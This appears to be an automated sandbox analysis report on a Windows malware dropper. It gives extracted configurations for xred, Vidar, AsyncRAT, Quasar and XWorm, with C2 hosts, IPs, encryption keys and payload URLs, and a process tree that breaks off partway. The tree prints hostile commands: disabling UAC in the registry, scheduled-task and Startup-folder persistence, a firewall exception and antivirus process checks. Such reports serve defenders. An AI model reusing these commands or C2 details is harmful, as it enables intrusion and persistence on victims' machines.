Analysis

  • max time kernel
    15s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-01-2025 00:01

General

  • Target

    New Text Document mod.exe

  • Size

    761KB

  • MD5

    c6040234ee8eaedbe618632818c3b1b3

  • SHA1

    68115f8c3394c782aa6ba663ac78695d2b80bf75

  • SHA256

    bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0

  • SHA512

    a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf

  • SSDEEP

    12288:mMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9mWej:mnsJ39LyjbJkQFMhmC+6GD9I

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    [email protected]

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

vidar

C2

https://t.me/sc1phell

https://steamcommunity.com/profiles/76561199819539662

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Program

C2

tuna91.duckdns.org:1604

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    true

  • install_file

    system.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

bot

C2

wexos47815-61484.portmap.host:61484

Mutex

06e2bb33-968c-4ca7-97dc-f23fbd5c3092

Attributes
  • encryption_key

    8924CB3C9515DA437A37F5AE598376261E5528FC

  • install_name

    msinfo32.exe

  • log_directory

    Update

  • reconnect_delay

    3000

  • startup_key

    Discordupdate

  • subdirectory

    dll32

Extracted

Family

xworm

Version

3.1

C2

172.86.108.55:7771

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Extracted

Family

xworm

Version

5.0

Mutex

WlO6Om8yfxIARVE4

Attributes
  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/7G6zzQwJ

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

VM-KU

C2

adidya354-21806.portmap.host:21806

Mutex

cf7c4d30-a326-47cc-a5f0-5a19aa014204

Attributes
  • encryption_key

    E50BC33BC56B70B1A2963DE6EA1855A0E0D0FBCE

  • install_name

    Windows Shell Interactive.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows Shell Interactive

Extracted

Family

asyncrat

Version

A 13

Botnet

Default

C2

163.172.125.253:333

Mutex

AsyncMutex_555223

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

ROBLOX EXECUTOR

C2

192.168.50.1:4782

10.0.0.113:4782

LETSQOOO-62766.portmap.host:62766

89.10.178.51:4782

Mutex

90faf922-159d-4166-b661-4ba16af8650e

Attributes
  • encryption_key

    FFEE70B90F5EBED6085600C989F1D6D56E2DEC26

  • install_name

    windows 3543.exe

  • log_directory

    roblox executor

  • reconnect_delay

    3000

  • startup_key

    windows background updater

  • subdirectory

    windows updater

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

192.168.1.79:4782

Mutex

956eafb2-7482-407b-bff4-d2b57a1c3d75

Attributes
  • encryption_key

    EFEBD005E03B8B8669985D9A167E2BEF9FFCA477

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Family

quasar

Version

1.3.0.0

Botnet

School

C2

gamwtonxristo.ddns.net:1717

Mutex

QSR_MUTEX_M3Vba1npfJg3Ale25C

Attributes
  • encryption_key

    VtojWKM7f1XyCVdB41wL

  • install_name

    comctl32.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows Defender Startup Scan

  • subdirectory

    Windows Defender

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Vidar Stealer 3 IoCs
  • Detect Xworm Payload 3 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 10 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xred

    Xred is backdoor written in Delphi.

  • Xred family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Async RAT payload 2 IoCs
  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 23 IoCs
  • Modifies Windows Firewall 2 TTPs 8 IoCs
  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 27 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 44 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 13 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 13 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 25 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4556
    • C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
      2⤵
      • Downloads MZ/PE file
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5052
      • C:\Users\Admin\AppData\Local\Temp\a\1.exe
        "C:\Users\Admin\AppData\Local\Temp\a\1.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2680
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c copy Universities Universities.cmd & Universities.cmd
          4⤵
          • System Location Discovery: System Language Discovery
          PID:900
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            5⤵
            • Enumerates processes with tasklist
            PID:3852
          • C:\Windows\SysWOW64\findstr.exe
            findstr /I "opssvc wrsa"
            5⤵
              PID:2396
            • C:\Windows\SysWOW64\tasklist.exe
              tasklist
              5⤵
              • Enumerates processes with tasklist
              PID:5484
            • C:\Windows\SysWOW64\findstr.exe
              findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
              5⤵
                PID:5996
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c md 634977
                5⤵
                  PID:6752
                • C:\Windows\SysWOW64\extrac32.exe
                  extrac32 /Y /E Gtk
                  5⤵
                    PID:6440
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /V "Constitution" Wagon
                    5⤵
                      PID:3124
                • C:\Users\Admin\AppData\Local\Temp\a\test.exe
                  "C:\Users\Admin\AppData\Local\Temp\a\test.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Modifies system certificate store
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2172
                • C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe
                  "C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2392
                  • C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe
                    "C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe" -burn.filehandle.attached=688 -burn.filehandle.self=540
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:2436
                    • C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe
                      C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4920
                      • C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe
                        C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2416
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\SysWOW64\cmd.exe
                          7⤵
                            PID:624
                            • C:\Windows\SysWOW64\explorer.exe
                              C:\Windows\SysWOW64\explorer.exe
                              8⤵
                                PID:1012
                    • C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe
                      "C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"
                      3⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:1944
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                        "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe' -Force
                        4⤵
                          PID:5460
                      • C:\Users\Admin\AppData\Local\Temp\a\access.exe
                        "C:\Users\Admin\AppData\Local\Temp\a\access.exe"
                        3⤵
                          PID:2700
                        • C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe
                          "C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe"
                          3⤵
                            PID:2620
                            • C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe
                              "C:\Windows\TEMP\{0AEA5278-E430-43C6-AEB6-A6CB16805C3E}\.cr\QGFQTHIU.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\QGFQTHIU.exe" -burn.filehandle.attached=648 -burn.filehandle.self=652
                              4⤵
                                PID:1944
                                • C:\Windows\TEMP\{68F3F38E-816C-4A8A-9520-9E1A6A21E496}\.ba\msn.exe
                                  C:\Windows\TEMP\{68F3F38E-816C-4A8A-9520-9E1A6A21E496}\.ba\msn.exe
                                  5⤵
                                    PID:6844
                                    • C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe
                                      C:\Users\Admin\AppData\Roaming\serviceTlsv3_x86\msn.exe
                                      6⤵
                                        PID:6700
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\SysWOW64\cmd.exe
                                          7⤵
                                            PID:6368
                                            • C:\Windows\SysWOW64\explorer.exe
                                              C:\Windows\SysWOW64\explorer.exe
                                              8⤵
                                                PID:5508
                                    • C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe
                                      "C:\Users\Admin\AppData\Local\Temp\a\JJSPLOIT.V2.exe"
                                      3⤵
                                        PID:4468
                                        • C:\Windows\SYSTEM32\schtasks.exe
                                          "schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
                                          4⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:5384
                                        • C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe
                                          "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"
                                          4⤵
                                            PID:3184
                                            • C:\Windows\SYSTEM32\schtasks.exe
                                              "schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f
                                              5⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:6816
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                6⤵
                                                  PID:2416
                                        • C:\ProgramData\Synaptics\Synaptics.exe
                                          "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                          2⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry class
                                          • Suspicious use of WriteProcessMemory
                                          PID:3824
                                          • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
                                            "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
                                            3⤵
                                            • Downloads MZ/PE file
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of WriteProcessMemory
                                            PID:1900
                                            • C:\Users\Admin\AppData\Local\Temp\a\Update.exe
                                              "C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4356
                                            • C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
                                              "C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe"
                                              4⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of WriteProcessMemory
                                              PID:3676
                                              • C:\Windows\SysWOW64\msiexec.exe
                                                "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\0cef7d10d8f459fc\ScreenConnect.ClientSetup.msi"
                                                5⤵
                                                • Enumerates connected drives
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                • Suspicious use of FindShellTrayWindow
                                                PID:2872
                                            • C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe
                                              "C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:5036
                                            • C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
                                              "C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"
                                              4⤵
                                              • Adds policy Run key to start application
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • System Location Discovery: System Language Discovery
                                              • Modifies registry class
                                              • Suspicious use of WriteProcessMemory
                                              PID:4136
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of WriteProcessMemory
                                                PID:1828
                                                • C:\Windows\SysWOW64\reg.exe
                                                  C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                  6⤵
                                                  • UAC bypass
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies registry key
                                                  PID:3184
                                              • C:\Windows\SysWOW64\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
                                                5⤵
                                                • Checks computer location settings
                                                • System Location Discovery: System Language Discovery
                                                PID:1676
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"
                                                  6⤵
                                                    PID:3856
                                                    • C:\ProgramData\Bitdefender\$77-Bitdefender.exe
                                                      C:\ProgramData\Bitdefender\$77-Bitdefender.exe
                                                      7⤵
                                                        PID:4228
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                          8⤵
                                                            PID:776
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                              9⤵
                                                              • Modifies registry key
                                                              PID:3244
                                                          • \??\c:\program files (x86)\internet explorer\iexplore.exe
                                                            "c:\program files (x86)\internet explorer\iexplore.exe"
                                                            8⤵
                                                              PID:3888
                                                    • C:\Users\Admin\AppData\Local\Temp\a\windows.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\a\windows.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4232
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"' & exit
                                                        5⤵
                                                          PID:3668
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /f /sc onlogon /rl highest /tn "system" /tr '"C:\Users\Admin\AppData\Roaming\system.exe"'
                                                            6⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:4828
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD1C7.tmp.bat""
                                                          5⤵
                                                            PID:3364
                                                            • C:\Windows\SysWOW64\timeout.exe
                                                              timeout 3
                                                              6⤵
                                                              • Delays execution with timeout.exe
                                                              PID:1896
                                                            • C:\Users\Admin\AppData\Roaming\system.exe
                                                              "C:\Users\Admin\AppData\Roaming\system.exe"
                                                              6⤵
                                                                PID:4088
                                                          • C:\Users\Admin\AppData\Local\Temp\a\T.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\a\T.exe"
                                                            4⤵
                                                            • Executes dropped EXE
                                                            • System Location Discovery: System Language Discovery
                                                            PID:3252
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                                                              "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\T.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe' -Force
                                                              5⤵
                                                                PID:5328
                                                            • C:\Users\Admin\AppData\Local\Temp\a\36.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\a\36.exe"
                                                              4⤵
                                                                PID:4552
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 364
                                                                  5⤵
                                                                  • Program crash
                                                                  PID:5000
                                                              • C:\Users\Admin\AppData\Local\Temp\a\99999.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\a\99999.exe"
                                                                4⤵
                                                                  PID:616
                                                                  • C:\Users\Admin\AppData\Roaming\server.exe
                                                                    "C:\Users\Admin\AppData\Roaming\server.exe"
                                                                    5⤵
                                                                      PID:1600
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
                                                                        6⤵
                                                                        • Modifies Windows Firewall
                                                                        PID:1096
                                                                  • C:\Users\Admin\AppData\Local\Temp\a\22.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\a\22.exe"
                                                                    4⤵
                                                                      PID:4808
                                                                    • C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"
                                                                      4⤵
                                                                        PID:4152
                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                          "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                                          5⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2400
                                                                        • C:\Windows\system32\dll32\msinfo32.exe
                                                                          "C:\Windows\system32\dll32\msinfo32.exe"
                                                                          5⤵
                                                                            PID:5180
                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                              "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                                              6⤵
                                                                              • Scheduled Task/Job: Scheduled Task
                                                                              PID:5476
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\e6TONnwlRjZT.bat" "
                                                                              6⤵
                                                                                PID:5188
                                                                                • C:\Windows\system32\chcp.com
                                                                                  chcp 65001
                                                                                  7⤵
                                                                                    PID:5276
                                                                                  • C:\Windows\system32\PING.EXE
                                                                                    ping -n 10 localhost
                                                                                    7⤵
                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                    • Runs ping.exe
                                                                                    PID:5548
                                                                                  • C:\Windows\system32\dll32\msinfo32.exe
                                                                                    "C:\Windows\system32\dll32\msinfo32.exe"
                                                                                    7⤵
                                                                                      PID:5772
                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                        "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                                                        8⤵
                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                        PID:2424
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SdKVUC2UF3Oy.bat" "
                                                                                        8⤵
                                                                                          PID:4908
                                                                                          • C:\Windows\system32\chcp.com
                                                                                            chcp 65001
                                                                                            9⤵
                                                                                              PID:4528
                                                                                            • C:\Windows\system32\PING.EXE
                                                                                              ping -n 10 localhost
                                                                                              9⤵
                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                              • Runs ping.exe
                                                                                              PID:5388
                                                                                            • C:\Windows\system32\dll32\msinfo32.exe
                                                                                              "C:\Windows\system32\dll32\msinfo32.exe"
                                                                                              9⤵
                                                                                                PID:6504
                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                  "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                                                                  10⤵
                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                  PID:6576
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vaS5Lj59HSh3.bat" "
                                                                                                  10⤵
                                                                                                    PID:6680
                                                                                                    • C:\Windows\system32\chcp.com
                                                                                                      chcp 65001
                                                                                                      11⤵
                                                                                                        PID:6744
                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                        ping -n 10 localhost
                                                                                                        11⤵
                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                        • Runs ping.exe
                                                                                                        PID:6844
                                                                                                      • C:\Windows\system32\dll32\msinfo32.exe
                                                                                                        "C:\Windows\system32\dll32\msinfo32.exe"
                                                                                                        11⤵
                                                                                                          PID:6220
                                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                            "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                                                                            12⤵
                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                            PID:6372
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UvCM9DTMx1PL.bat" "
                                                                                                            12⤵
                                                                                                              PID:6112
                                                                                                              • C:\Windows\system32\chcp.com
                                                                                                                chcp 65001
                                                                                                                13⤵
                                                                                                                  PID:6488
                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                  ping -n 10 localhost
                                                                                                                  13⤵
                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:6656
                                                                                                                • C:\Windows\system32\dll32\msinfo32.exe
                                                                                                                  "C:\Windows\system32\dll32\msinfo32.exe"
                                                                                                                  13⤵
                                                                                                                    PID:5704
                                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                      "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                                                                                      14⤵
                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                      PID:7156
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hhjzBeMnS37F.bat" "
                                                                                                                      14⤵
                                                                                                                        PID:1460
                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                          chcp 65001
                                                                                                                          15⤵
                                                                                                                            PID:7016
                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                            ping -n 10 localhost
                                                                                                                            15⤵
                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:4704
                                                                                                                          • C:\Windows\system32\dll32\msinfo32.exe
                                                                                                                            "C:\Windows\system32\dll32\msinfo32.exe"
                                                                                                                            15⤵
                                                                                                                              PID:5664
                                                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                                                                                                16⤵
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:3316
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\plRuUThQ7DUV.bat" "
                                                                                                                                16⤵
                                                                                                                                  PID:5100
                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                    chcp 65001
                                                                                                                                    17⤵
                                                                                                                                      PID:6860
                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                      ping -n 10 localhost
                                                                                                                                      17⤵
                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                      • Runs ping.exe
                                                                                                                                      PID:1012
                                                                                                                                    • C:\Windows\system32\dll32\msinfo32.exe
                                                                                                                                      "C:\Windows\system32\dll32\msinfo32.exe"
                                                                                                                                      17⤵
                                                                                                                                        PID:1436
                                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                          "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                                                                                                          18⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:5152
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8CcSCQtjZT2g.bat" "
                                                                                                                                          18⤵
                                                                                                                                            PID:2528
                                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                                              chcp 65001
                                                                                                                                              19⤵
                                                                                                                                                PID:5540
                                                                                                                                              • C:\Windows\system32\PING.EXE
